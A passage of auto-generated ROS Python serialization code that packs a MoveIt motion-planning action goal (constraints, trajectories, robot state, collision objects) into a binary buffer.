buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v337.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v339 = _v336.pose _v340 = _v339.position _x = _v340 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v341 = 
_v339.orientation _x = _v341 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) _x = self.goal.request.path_constraints.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.path_constraints.joint_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.joint_constraints: _x = val1.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(self.goal.request.path_constraints.position_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.position_constraints: _v342 = val1.header buff.write(_get_struct_I().pack(_v342.seq)) _v343 = _v342.stamp _x = _v343 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v342.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v344 = val1.target_point_offset _x = _v344 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v345 = val1.constraint_region length = len(_v345.primitives) buff.write(_struct_I.pack(length)) for val3 in _v345.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v345.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v345.primitive_poses: _v346 = val3.position _x = _v346 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v347 = val3.orientation _x = _v347 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v345.meshes) buff.write(_struct_I.pack(length)) for val3 in _v345.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v345.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v345.mesh_poses: _v348 = val3.position _x = _v348 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v349 = val3.orientation _x = _v349 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val1.weight)) length = len(self.goal.request.path_constraints.orientation_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.orientation_constraints: _v350 = val1.header buff.write(_get_struct_I().pack(_v350.seq)) _v351 = _v350.stamp _x = _v351 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v350.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v352 = val1.orientation _x = _v352 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') 
length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(self.goal.request.path_constraints.visibility_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.visibility_constraints: buff.write(_get_struct_d().pack(val1.target_radius)) _v353 = val1.target_pose _v354 = _v353.header buff.write(_get_struct_I().pack(_v354.seq)) _v355 = _v354.stamp _x = _v355 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v354.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v356 = _v353.pose _v357 = _v356.position _x = _v357 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v358 = _v356.orientation _x = _v358 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val1.cone_sides)) _v359 = val1.sensor_pose _v360 = _v359.header buff.write(_get_struct_I().pack(_v360.seq)) _v361 = _v360.stamp _x = _v361 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v360.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v362 = _v359.pose _v363 = _v362.position _x = _v363 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v364 = _v362.orientation _x = _v364 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.trajectory_constraints.constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.trajectory_constraints.constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v365 = val2.header buff.write(_get_struct_I().pack(_v365.seq)) _v366 = _v365.stamp _x = _v366 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v365.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v367 = val2.target_point_offset _x = _v367 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v368 = val2.constraint_region length = len(_v368.primitives) buff.write(_struct_I.pack(length)) for val4 in _v368.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val4.dimensions.tostring()) length = len(_v368.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v368.primitive_poses: _v369 = val4.position _x = _v369 
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v370 = val4.orientation _x = _v370 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v368.meshes) buff.write(_struct_I.pack(length)) for val4 in _v368.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(val5.vertex_indices.tostring()) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v368.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v368.mesh_poses: _v371 = val4.position _x = _v371 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v372 = val4.orientation _x = _v372 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v373 = val2.header buff.write(_get_struct_I().pack(_v373.seq)) _v374 = _v373.stamp _x = _v374 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v373.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v375 = val2.orientation _x = _v375 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v376 = val2.target_pose _v377 = _v376.header buff.write(_get_struct_I().pack(_v377.seq)) _v378 = _v377.stamp _x = _v378 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v377.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v379 = _v376.pose _v380 = _v379.position _x = _v380 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v381 = _v379.orientation _x = _v381 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v382 = val2.sensor_pose _v383 = _v382.header buff.write(_get_struct_I().pack(_v383.seq)) _v384 = _v383.stamp _x = _v384 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v383.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v385 = _v382.pose _v386 = _v385.position _x = _v386 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v387 = _v385.orientation _x = _v387 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.reference_trajectories) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.reference_trajectories: _v388 = val1.header buff.write(_get_struct_I().pack(_v388.seq)) _v389 = _v388.stamp _x = _v389 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v388.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, 
_x)) length = len(val1.joint_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.joint_trajectory: _v390 = val2.header buff.write(_get_struct_I().pack(_v390.seq)) _v391 = _v390.stamp _x = _v391 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v390.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.joint_names) buff.write(_struct_I.pack(length)) for val3 in val2.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v392 = val3.time_from_start _x = _v392 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) length = len(val1.cartesian_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.cartesian_trajectory: _v393 = val2.header buff.write(_get_struct_I().pack(_v393.seq)) _v394 = _v393.stamp _x = _v394 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v393.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.tracked_frame length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: _v395 = val3.point _v396 = _v395.pose _v397 = _v396.position _x = _v397 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v398 = _v396.orientation _x = _v398 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _v399 = _v395.velocity _v400 = _v399.linear _x = _v400 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v401 = _v399.angular _x = _v401 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v402 = _v395.acceleration _v403 = _v402.linear _x = _v403 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v404 = _v402.angular _x = _v404 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v405 = val3.time_from_start _x = _v405 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) _x = self.goal.request.planner_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self.goal.request.group_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_i3d().pack(_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor)) _x = self.goal.planning_options.planning_scene_diff.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self 
buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position.tostring()) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity.tostring()) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort.tostring()) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms: _v406 = val1.translation _x = _v406 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v407 = val1.rotation _x = _v407 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist: _v408 = val1.linear _x = _v408 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v409 = val1.angular _x = _v409 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = 
len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench: _v410 = val1.force _x = _v410 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v411 = val1.torque _x = _v411 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v412 = val1.object _v413 = _v412.header buff.write(_get_struct_I().pack(_v413.seq)) _v414 = _v413.stamp _x = _v414 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v413.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v412.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v415 = _v412.type _x = _v415.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v415.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v412.primitives) buff.write(_struct_I.pack(length)) for val3 in _v412.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v412.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.primitive_poses: _v416 = val3.position _x = _v416 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v417 = val3.orientation _x = _v417 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.meshes) buff.write(_struct_I.pack(length)) for val3 in _v412.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v412.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.mesh_poses: _v418 = val3.position _x = _v418 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v419 = val3.orientation _x = _v419 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.planes) buff.write(_struct_I.pack(length)) for val3 in _v412.planes: buff.write(val3.coef.tostring()) length = len(_v412.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.plane_poses: _v420 = val3.position _x = _v420 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v421 = val3.orientation _x = _v421 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v412.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v412.subframe_poses) 
buff.write(_struct_I.pack(length)) for val3 in _v412.subframe_poses: _v422 = val3.position _x = _v422 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v423 = val3.orientation _x = _v423 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v412.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v424 = val1.detach_posture _v425 = _v424.header buff.write(_get_struct_I().pack(_v425.seq)) _v426 = _v425.stamp _x = _v426 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v425.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v424.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v424.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v424.points) buff.write(_struct_I.pack(length)) for val3 in _v424.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v427 = val3.time_from_start _x = _v427 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.robot_state.is_diff)) _x = self.goal.planning_options.planning_scene_diff.robot_model_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.fixed_frame_transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.fixed_frame_transforms: _v428 = val1.header buff.write(_get_struct_I().pack(_v428.seq)) _v429 = _v428.stamp _x = _v429 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v428.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.child_frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v430 = val1.transform _v431 = _v430.translation _x = _v431 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v432 = _v430.rotation _x = _v432 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = 
len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values: length = len(val1.enabled) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(val1.enabled.tostring()) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values.tostring()) length = len(self.goal.planning_options.planning_scene_diff.link_padding) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_padding: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.padding)) length = len(self.goal.planning_options.planning_scene_diff.link_scale) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_scale: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.scale)) length = len(self.goal.planning_options.planning_scene_diff.object_colors) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.object_colors: _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v433 = val1.color _x = _v433 buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a)) length = len(self.goal.planning_options.planning_scene_diff.world.collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.world.collision_objects: _v434 = val1.header buff.write(_get_struct_I().pack(_v434.seq)) _v435 = _v434.stamp _x = _v435 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v434.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v436 = val1.type _x = _v436.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v436.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.primitives) buff.write(_struct_I.pack(length)) for val2 in val1.primitives: buff.write(_get_struct_B().pack(val2.type)) length = len(val2.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val2.dimensions.tostring()) length = len(val1.primitive_poses) 
buff.write(_struct_I.pack(length)) for val2 in val1.primitive_poses: _v437 = val2.position _x = _v437 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v438 = val2.orientation _x = _v438 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.meshes) buff.write(_struct_I.pack(length)) for val2 in val1.meshes: length = len(val2.triangles) buff.write(_struct_I.pack(length)) for val3 in val2.triangles: buff.write(val3.vertex_indices.tostring()) length = len(val2.vertices) buff.write(_struct_I.pack(length)) for val3 in val2.vertices: _x = val3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(val1.mesh_poses) buff.write(_struct_I.pack(length)) for val2 in val1.mesh_poses: _v439 = val2.position _x = _v439 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v440 = val2.orientation _x = _v440 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.planes) buff.write(_struct_I.pack(length)) for val2 in val1.planes: buff.write(val2.coef.tostring()) length = len(val1.plane_poses) buff.write(_struct_I.pack(length)) for val2 in val1.plane_poses: _v441 = val2.position _x = _v441 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v442 = val2.orientation _x = _v442 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.subframe_names) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_names: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) length = len(val1.subframe_poses) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_poses: _v443 = val2.position _x = _v443 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v444 = val2.orientation _x = _v444 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(val1.operation)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id length = len(_x) if python3 or type(_x) == 